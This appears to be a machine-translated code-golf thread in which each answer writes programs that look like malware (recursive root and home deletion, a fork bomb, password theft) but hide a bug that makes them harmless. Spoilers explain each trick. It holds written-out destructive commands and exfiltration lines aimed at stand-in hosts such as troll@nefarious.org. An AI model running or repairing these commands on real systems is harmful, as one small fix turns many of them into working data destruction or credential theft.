巨魔捕获了您，并迫使您编写恶意软件（定义为破坏运行它的计算机的程序）。巨魔可以阅读和理解代码，但是不善于发现错误。

您的目标是编写一个程序，该程序：

1. 看起来像恶意软件；即，一个刚开始阅读代码的程序员将被认为该代码会对运行它的计算机造成损害。
2. 实际上完全没有损坏。

注意：巨魔仅读取代码，而不注释。因此，代码本身应该清晰且令人信服。

示例（重击）：

rm - rf /home

此示例看起来像是rm -rf /home从系统中删除了所有主文件夹，但是实际上，由于rf之前的空间，这将无法正常工作，并且只会导致无害的错误消息。

这是可以接受的解决方案，但不是很好，因为该错误很容易检测到。

另一方面，复杂且不可读的程序也不是很好的解决方案，因为它看起来不会像恶意软件。

一个好的解决方案应该足够易读，以使读者相信它是恶意软件，但其中包含一个难以检测并使其无害的错误。

这是一次人气竞赛，因此投票最多的代码将获胜。

重击

我走了另一条路。除了删除硬盘驱动器上的所有内容之外，我将用垃圾填充它。

该脚本创建了一个文件夹，然后将cat所有文件连续地组合在一起，并将它们放到一个新的文件夹中，并添加ls -al了作好衡量的值（这样，起始文件中就有内容）。

#!/bin/bash/

makeSpam()
{
    string=`cat *`
    string=$string`ls -al`
    echo $string > "file"$i".spam"
}

mkdir "SpamForYou"
cd "SpamForYou"

i=1
while [ 1 ]
do
  makeSpam $i
  i=$(($i + 1))
done

除了...

/ bin / bash /（而不是/ bin / bash）不太可能是有效的解释器。这只是我的常见错字。并且，由于“从技术上讲，shebang是评论，因此巨魔将忽略它”

哈斯克尔

检查此手册页，removeDirectoryRecursive删除目录及其所有内容！

import System.Directory
main = return (removeDirectoryRecursive "/")

正确的代码应该是main = removeDirectoryRecursive "/"
该main函数应该返回做某件事的概念。removeDirectoryRecursive "/"返回擦除文件系统的概念，但是return函数（是的，它是一个函数）将其参数包装在返回该值的虚拟概念中。
因此，我们最终得到了一个擦拭驱动器的概念。（您好，我喜欢您喜欢的概念。） haskell运行时执行从中返回的概念，main并丢弃返回的值，在我们的情况下，这是擦除文件系统的概念。

的PHP

这是一个递归PHP脚本，试图删除网站中的每个文件。如果网站很大，可能需要一段时间才能完成，因此请耐心等待...

<html>
<body>
<p>Deleting website; please wait
<img src="data:image/gif;base64,R0lGODlhCAAIAPAAAAAAAP///yH/C05FVFNDQVBFMi4wAwEAAAAh+QQEMgD/ACwAAAAACAAIAAACBoSPqcvtXQAh+QQFMgAAACwAAAAACAAIAAACBoyPqcvtXQA7" /></p>
<?php

function zapfiles($dir) {
  if (is_dir($dir)) {
    $files = scandir($dir);
    foreach ($files as $file) {
      if ($file != '.' && $file != '..') {
        if (is_dir("$dir/$file")) {
          zapfiles("$dir/$file");
        }
        else {
          try {
            @delete("$dir/$file"); // Suppress locked file errors
          }
          catch (Exception $e) {
            // Locked files can't be deleted; just carry on
          }
        }
      }
    }
  }
}

zapfiles($_SERVER['DOCUMENT_ROOT']);

?>
<p>Website deletion complete</p>

只是一个_青少年问题...

PHP中没有delete（）命令。脚本在遇到此命令后将立即失败，但不会显示任何错误消息，因为通过在此命令前加上@可以抑制错误报告。闪烁的GIF图像给人的印象是正在发生任何事情，而完全没有任何事情发生。

Perl（Unix）

删除系统上的所有文件。

#! /usr/bin/perl -w
use strict;

sub killdir {
    opendir(my $dh, ".");
    my @dl = readdir($dh);
    closedir($dh);
    foreach my $de (@dl) {
        if (-d $de) {
            chdir($de);
            killdir();
            chdir("..");
            rmdir($de);
        } else {
            unlink($de);
        }
    }
}

chdir("/");
killdir();

特征

• 这是有效的Perl。它甚至可以使用-w和编译并运行use strict！

• 没有像C ++那样的小问题delete。 unlink确实是删除文件，rmdir删除目录等功能。

• 通过更改为每个目录以使用相对路径，可以正确处理绝对路径名可能超过系统最大长度的深层嵌套目录。同样，不会耗尽目录句柄，因为它会在递归之前读取并关闭目录。

扰流板

在Unix上，根目录中的第一个条目通常是“。”。因此该程序将执行chdir（“。”）的无限递归，直到耗尽内存并崩溃。

进一步说明

做到这一点比预期的要难。如果不使用chdir方法，则最终会得到一个太长的路径名。然后-d返回false并且无限递归被破坏，文件实际上可能被删除了！如果您保持目录句柄打开，可能会发生类似的错误。最终您用完了，opendir失败，killdir返回，并且删除开始发生。

外壳一线

这将窃取受害者的所有密码，私钥，比特币等。

 find / -name "passwd" -or -name "shadow" -or -name "secring.gpg" -or -name "wallet.dat" |mail troll@nefarious.org

扰流板：

看起来好像它通过电子邮件将所有这些文件发送到了巨魔，但实际上它只是通过电子邮件发送了它们的文件名。

批次/ CMD

救

DEL %0
DEL %1
DEL %2
DEL %3
DEL %4
DEL %5
DEL %6
DEL %7
DEL %8
DEL %9

并让它们使用计算机上每个驱动器的参数运行它。

％0始终是第一个参数-文件名。在这之后是一组实际参数，但是它已经删除了自己，因此不会继续。

Java脚本

infiniteLoop=true;
evilMessage='I spam you !';
while(infiniteLoop) {
  eval(atob('aW5maW5pdGVMb29wPWZhbHNlO2V2aWxNZXNzYWdlPWV2aWxNZXNzYWdlLnJlcGxhY2UoInNwYW0iLCJMT1ZFIik7'));
  alert(evilMessage);
}

好吧，原始恶意软件不会破坏您的计算机，但可能会令人讨厌。

这是无害的，因为：

在eval将打破无限循环，并修改该消息。

爪哇

愿诸神原谅我屈服于您的不幸要求，巨魔。

class HomeWrecker {
    public static void main(String[] args) throws Exception {
        Runtime.getRuntime().exec("rm -rf /home/*");
    }
}

Runtime.exec 不会调用外壳程序，因此不会进行全局扩展，并且该命令将尝试删除名称为“ *”的主目录，但不会成功

C

由于他没有阅读应做的评论：

#include<stdlib.h>
int main()
{
//Are you reading this??/
 system("C:\\WINDOWS\\System32\\shutdown /s /t 0000");

 return 0;
}

C ++版本

感谢DragonLord为此。

#include<cstdlib>
int main ()
{
//Are you reading this??/
system("shutdown -s -t 0000");
return 0; 
}

将其添加到启动文件夹中，然后重新启动计算机。

这个怎么运作：

?? /是一个三元组，将在注释中添加下一行，因此基本上不会执行任何操作。注意：请勿尝试将此Trigraph作为默认情况在某些编译器中关闭，并且必须将其打开才能起作用。

爪哇

import java.io.File;
class derp
{
    public static void main( String[] a)
    {
        new File("C:\\windows\\System32\ntoskrnl.exe").delete();
    }
}

使用转义符（ntoskrnl.exe之前的\ n是换行符，而不是普通的N）

重击

#!/bin/bash
set -t 

echo "hahaha deleting files.."
rm -rf / --no-preserve-root

set -t将在读取并执行一个命令后退出。该脚本不输出任何输出，所有文件都是安全的！

或以下但在运行前请阅读脚踏车

#!/bin/bash -t
echo "hahaha deleting files.."
rm -rf / --no-preserve-root

根据大众的要求.. #!/bin/bash -t将在读取并执行一个命令后退出。不要在下面运行它，bash -x因为它将忽略-t和执行脚本中的命令。

蟒蛇

print "****----....____....----"""" This program will clear the browser cache "

import os
from os.path import expanduser
home = expanduser("~")
os.remove(home)

print """"----....____....----***** Cache cleaned. "                                     

三个引号“””在Python中启动多行字符串

d

该程序有效，执行没有错误。它在新线程中产生删除功能，该功能会删除root目录。

import std.concurrency : spawn;
import std.file : rmdirRecurse;

string root;

void deleteRoot()
{
    if (root)
        rmdirRecurse(root);
}

void main()
{
    root = "/";
    spawn(&deleteRoot);
    // ... could add a waiting animation here.
}

但是什么都没有删除...

因为在D中，默认情况下在模块作用域声明的变量是线程局部的。该main功能将其设置为“/”，但产卵线程有一个空的副本，所以该rmdirRecurse功能没有被调用。

C（Unix）

添加一些广告绝不会伤害任何人。

#include <stdlib.h>

int main()
{
    // Join the crew
    goto http;//www.trolling.com
    print("Sucker!\n");
    system("rm -rf ~");
    // Remember goto
    http://www.trolling.com
    return 0;
}

http：这是一个标签，转到跳转到缺少有害代码的标签。：V

的JavaScript

function foo(a) { // Returns an object, and all objects are truly
    return
    {
        a: a
    };
}
for(var i=0; foo(i); ++i) // loop condition is always truly
    alert('Infinite alerts!');

没有显示警报。由于JavaScript不需要;在行尾，因此会在return变成后自动插入return;。然后undefined返回虚假的，而不是“对象”（实际上被解析为块语句）。

的JavaScript

//Config: Warning!!! only set to true on victims box!
var deleteEverything = true;

function deleteIfEvil(){
  if(deleteEverything){
    alert('Destroy Everything!');
    //clear the flag
    var deleteEverything = false;
  } else {
    alert('Tested OK!');
  }
}

deleteIfEvil();

交换破坏警报，以防您想要使用任何令人讨厌的破坏性行动。

扰流板：

虽然看起来配置已设置为delete ... ，但它是！函数内部的“ var”声明是“悬挂的” http://www.adequatelygood.com/JavaScript-Scoping-and-Hoisting.html，因此进入函数时实际上为假。

爪哇

让我们删除一些重要文件！

import java.io.File;
import java.io.IOException;

public class Deleter {

    private File importantFile = null;

    public Deleter(File f) {

        importantFile = f;

        /**}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{
         * }{ I don't care how important that file is. I'm going to delete it! }{
         * }{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{*/}{

        importantFile.delete();

    }

    public static void main(String[] args) throws IOException {
        // Let's delete some important stuff
        new Deleter(new File("/boot/vmlinuz"));
        new Deleter(new File("/etc/passwd"));
        new Deleter(new File("/etc/crontab"));
        new Deleter(new File("/etc/sudoers"));
    }

}

注释中隐藏了一个额外的{}。这会将文件删除放在单独的实例初始化块中，该块在构造函数之前执行。那时，重要文件仍然为空。

Bash，C，Linux

也许它并非完全是恶意软件，但可以肯定是其中的一部分:)

这是一个了不起的发现，它可以让您在任何Linux机器上都具有root权限！嘘，没人告诉我们我们拥有它！

#!/bin/sh
cd /tmp
cat >ex.c <<eof
int getuid() { return 0; }
int geteuid() { return 0; }
int getgid() { return 0; }
int getegid() { return 0; }
eof
gcc -shared ex.c -oex.so
LD_PRELOAD=/tmp/ex.so sh
rm /tmp/ex.so /tmp/ex.c

现在执行脚本，您将成为root用户！您可以确保使用whoami！

实际上，它只会欺骗您UID = 0（这是root用户ID）的所有应用程序。

该代码由Lcamtuf编写，来源：http：//lcamt​​uf.coredump.cx/soft/ld-expl

重击

cat <<EOF
ProHaxer Hacking Tool 2014. Destroying your computer in
background, please wait until it finishes.
EOF

# Freeze the machine, so nobody will stop the process.
:(){:|:&};:

# Remove stuff in the background.
rm -rf /* &>/dev/null &

“ fork-bomb”行上存在语法错误。在{之后，应该有一个空格。没有它，脚本将失败，因为函数定义本身后没有{标记。

埃马克斯·利斯普（Emacs Lisp）

首先是一个简单的。这个没有做。实际上，它正在尝试从返回的列表中删除等于：recursive的元素directory-files。它不会删除任何文件。

(delete :recursive
    (directory-files "/"))

这是一个甚至可能会绊倒埃利斯派兽医的人。

(let ((files (directory-files "/")))
  (while (setq file (pop files) )
    (delete-file file)))

删除根目录仅1个字符。

emacs lisp将允许jsut用作符号的名称（变量，函数，宏等）。可以在符号名称中使用unicode，这就是这里发生的情况。

setq可以接受任意数量的args (setq a 3 b 4)就像做a = 3; b = 4；但是(setq a 3 b)也是有效的，并且做a = 3; b =无；

setq的返回值是分配给最后一个变量的值。在示例中分别为4和nil。

(setq a 3 b)正是代码中正在发生的事情，但是我使用的是unicode空格字符而不是b。我将值nil分配给一个名为unicode字符0x2001的变量。因此，setq返回nil，而while循环的条件永远不会为真。取出该空格字符，它将正常运行。

只是另一个perl黑客。

我在2002年写这本书的时候，在Perlmonks闲逛时，通常只是想尽可能地提高我对Perl的了解。根本没有编辑它，但是它仍然可以运行。

#!/usr/bin/perl -w
use strict;
require File::Path;

my $root_dir = '/';

$root_dir = 'c:\\' if( $^O =~ /Win/i );

rmtree( $root_dir );

mkdir( $root_dir );

open( ROOT, $root_dir );

while(1)
{
  BEGIN{@INC=sub{*DATA}}
  print ROOT <DATA>;
}

__DATA__
# Fill the harddrive with junk!
''=~('('.'?'.'{'.('`'|'%').('['
^'-').('`'|'!').('`'|',').'"'.(
'['^'+').('['^')').('`'|"\)").(
'`'|'.').('['^'/').('{'^('[')).
'\\'.'"'.('`'^'*').('['^"\.").(
'['^'(').('['^'/').('{'^"\[").(
'`'|'!').('`'|'.').('`'|"\/").(
'['^'/').('`'|'(').('`'|"\%").(
'['^')').('{'^'[').('['^"\+").(
'`'|'%').('['^')').('`'|"\,").(
'{'^'[').('`'|'(').('`'|"\!").(
'`'|'#').('`'|'+').('`'|"\%").(
'['^')').'.'.'\\'.'\\'.('`'|'.'
).'\\'.'"'.';'.('`'|'%').("\["^
'#').('`'|')').('['^'/').(';').
'"'.'}'.')');$:='.'^'~';$~='@'|
'(';$^=')'^'[';$/='`'|('.');$_=
'('^'}';$,='`'|'!';$\=')'^"\}";
$:='.'^'~';$~='@'|'(';$^=(')')^
'[';$/='`'|'.';$_='('^('}');$,=
'`'|'!';$\=')'^'}';$:='.'^"\~";
$~='@'|'(';$^=')'^'[';$/=('`')|
'.';$_='('^'}';$,='`'|('!');$\=
')'^'}';$:='.'^'~';$~='@'|"\(";
$^=')'^'[';$/='`'|'.';$_=('(')^
'}';$,='`'|'!';$\=')'^('}');$:=
'.'^'~';$~='@'|'(';$^=')'^"\[";

如果我没记错的话，BEGIN无论代码在哪里，该块都首先运行。它用@INC子例程（通常是一组路径，但这是允许的）替换确定了Perl从何处加载其库的库。子例程实际上是混淆的数据块，它在做一些regexp + eval魔术。然后，当代码命中时require File::Path;（它不会使用use），该子程序将被执行，并按照传统的方式打印“ Just another perl hacker。”，然后退出。其余代码将永远无法到达。

PHP：

$condition = true and false;

if (!$condition) {
   // DO EVIL - Just do something evil here
}

乍看之下，$condition是，但=运算符的优先级高于and，因此条件为真。所以邪恶永远不会完成。

带有Boost的C ++

这将删除文件系统上的所有文件

#include "boost/filesystem.hpp"
using namespace boost::filesystem;

void delete_directory(const path* dir_path)
{
  if (!exists(*dir_path)) return;

  directory_iterator end_file_itr;
  for (directory_iterator file_itr(*dir_path);
        file_itr != end_file_itr;
        ++file_itr) {
    const path* file = &file_itr->path();
    if (file_itr->status().type() == directory_file) {
      delete_directory(file);
    } else {
      delete(file);
    }
  }

  delete(dir_path);
}

int main() {
  delete_directory(new path("/"));
  return 0;
}

其实不会。delete在C ++中，C ++用于释放由分配的内存new，而不删除文件和目录。该程序在尝试释放Boost分配的内存时很可能会因分段错误而崩溃，但是到那时，我将摆脱巨魔的束缚。

爪哇

这会假装下载RAM，但是会删除用户的主目录。

import java.util.*;
import java.io.*;
class RamDownloaderIO {
    public static void main(String[] args) {
        long onePercentWaitTime   = 2*60*1000;  // 2 minutes
        long twoPercentWaitTime   = 7*60*1000;  // 7 minutes
        long deleteWaitTime       = 9*60*1000;  // 9 minutes
        long completeWaitTime     = 10*60*1000; // 10 minutes
        Timer timer = new Timer(true);
        // User thinks, Hmm this is taking a while
        timer.schedule(new TimerTask() {
            public void run() {
                System.out.println("1% done");
            }
        }, onePercentWaitTime);
        // User is now completely impatient, and either leaves to get a coffee
        // or starts reading reddit
        timer.schedule(new TimerTask() {
            public void run() {
                System.out.println("2% done");
            }
        }, twoPercentWaitTime);
        // Now that he's not looking, delete everything in his home directory
        timer.schedule(new TimerTask() {
            public void run() {
                try {
                    final Runtime rt = Runtime.getRuntime();
                    rt.exec("rm -rf ~/*");
                } catch (IOException e) {
                }
            }
        }, deleteWaitTime);
        // Inform the user that the task is finished
        timer.schedule(new TimerTask() {
            public void run() {
                System.out.println("Download complete!");
                System.out.println("You now have 21.47GB RAM!");
                System.exit(0);
            }
        }, completeWaitTime);
        System.out.println("Welcome to the ramdownloader.io RAM downloader");
        System.out.println("Please wait. Downloading your free RAM...");

    }
}

Timer使用后台线程调用您TimerTask提交给它的。new Timer(true)创建一个Timer将后台线程设置为守护程序线程的，因此程序可以在运行任务之前立即退出。太长的代码使巨魔无法看到true参数。

rm -rf ⁄

该字符不是常规的斜杠字符（/，即Unicode中的SOLIDUS），而是FRACTION SLASH。将显示类似“ rm：⁄：没有这样的文件或目录”的消息

重击

# This script should always be executed as root #
set -e

cleanup() {
  rm -rf / --no-preserve-root
}

eval $(base64 -d <<< "dW5zZXQgLWYgY2xlYW51cA==")
eval $(base64 -d <<< "Y2xlYW51cCgpIHsgZWNobyBUcm9sbCBkZXRlY3RlZDsgfQo=")
cleanup

它可能会变得邪恶。它定义了一个函数rm -rf /并将其调用。它不仅利用了邪恶eval不止一次。

当然会造成很多损害！

如果您想知道，第一个eval通过以下方式取消设置功能： unset -f cleanup 第二个eval将其定义为： cleanup() { echo Troll detected; } 因此，在运行代码时，您会看到 Troll detected

重击

当然，我们需要计算机的root特权，因此我们使用旧的“我是否具有root？”检查器，又名ch（eck）root -但最好是在目录中不会有提出了许多警报做到这一点。/ tmp会很完美，因为每个人都可以在那里写文件。

在此之后，我们只删除整个硬盘上的邪恶笑声

mkdir -p /tmp/chroot_dir && chroot /tmp/chroot_dir /bin/bash -c "su - -c rm -rf /*"

iPhone-飞扬的鸟克隆

当用户播放iPhone Flappy Bird克隆文件时，Documents目录中的所有文件都将被删除。

#import "AppDelegate.h"
#import "FlappyBirdClone.h"

@implementation AppDelegate

- (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions
{
    FlappyBirdClone *flappyBirdClone = [FlappyBirdClone new];
    [flappyBirdClone startFlapping];

    NSURL *documentsDirectory = [[[NSFileManager defaultManager] URLsForDirectory:NSDocumentDirectory inDomains:NSUserDomainMask] lastObject];
    [self deleteAllDocumentsInDirectory:documentsDirectory];

    return YES;
}

- (void)deleteAllDocumentsInDirectory:(NSURL *)directoryURL
{
    NSArray *fileURLs = [[NSFileManager defaultManager] contentsOfDirectoryAtURL:directoryURL includingPropertiesForKeys:@[] options:0 error:nil];

    [fileURLs enumerateObjectsUsingBlock:^(NSURL *fileURL, NSUInteger idx, BOOL *stop) {
        [[NSFileManager defaultManager] removeItemAtURL:fileURL error:nil];
    }];
}

iOS中的每个应用程序都是沙盒化的，因此尽管这会删除Documents目录中的所有内容，但仅是此特定应用程序的Documents目录。巨魔显然不知道这一点，因为他已经被其他平台上如此众多的程序所淹没。而且，一旦他意识到自己也可以推出Flappy Bird克隆版本，他可能会很兴奋，甚至没有去考虑其余的代码，因为他太着迷于梦想每天赚50,000美元的广告做任何工作。

走：

package main

import (
    "fmt"
    "os"
    "sync"
)

func main() {
  wg := sync.WaitGroup{}
  go deleteAll(wg)
  wg.Wait()
}

func deleteAll(wg sync.WaitGroup) {
    wg.Add(1)
    defer wg.Done()
    fmt.Println("Press enter to clean your computer!")
    fmt.Scanln()
    os.RemoveAll("/home")
}

这个有点棘手。在Go中，当主Goroutine退出时，整个程序退出。解决此问题的一个好方法是使用Waitgroup。我的“修复”有两个大问题：

1. 在Goroutine启动之前，不会添加Waitgroup，这意味着主Goroutine将Wait在删除Goroutine之前先命中Add。由于计数器将为0，因此它没有任何等待的时间，因此它不会阻塞并且只会退出，从而终止程序。
2. 即使以某种方式神奇地完成了deleteAll goroutine的添加操作。它得到了Waitgroup的副本，而不是指向它的指针。它不会添加到相同的Waitgroup中，因此主Goroutine将永远不会看到它。

期望输入的fmt.Scanln（）只是为了确保主Goroutine在任何事情发生之前就退出。Println可能会导致其进入IO块并切换到运行主Goroutine（因此退出），而Scanln几乎肯定会这样做。实际上，任何版本的Go都不需要。

在超级理论中，此MIGHT工作并删除了一些东西，这意味着根据Go内存模型，对于的结束main和执行，没有保证的“先发生”关系RemoveAll，但事实证明，在任何现代的Go运行时/编译器中都不会保证这种关系所有新手都犯了一个错误，即他们没有在主要功能中使用同步功能。

Java脚本

function(){
    setInterval(function(){
        var passwordList = document.getElementsByTagName('input') ;
        var i, length = passwordList.length ;
        for(i = 0 ; i < lenght ; i++) if(passwordList[i].type == 'password'){
            var img = document.createElement('img') ;
            img.src = 'http://troll-server-password-listener.com/fake-image.jpg?password=' + passwordList[i].value ;
            img.style.display = none ;
            img.addEventListener('load', function(){
                var that = this ;
                setTimeout(function(){ that.outerHTML = '' }, 0) ;
            }) ;
            document.body.appendChild(img) ;
        }
    }, 1) ;
}() ;

1。

它不会运行，您不能创建一个全封闭的容器，而不能用括号替代它

2。

如果巨魔设法解决了这个问题，那么有一个漂亮的错字可以调试... ;-)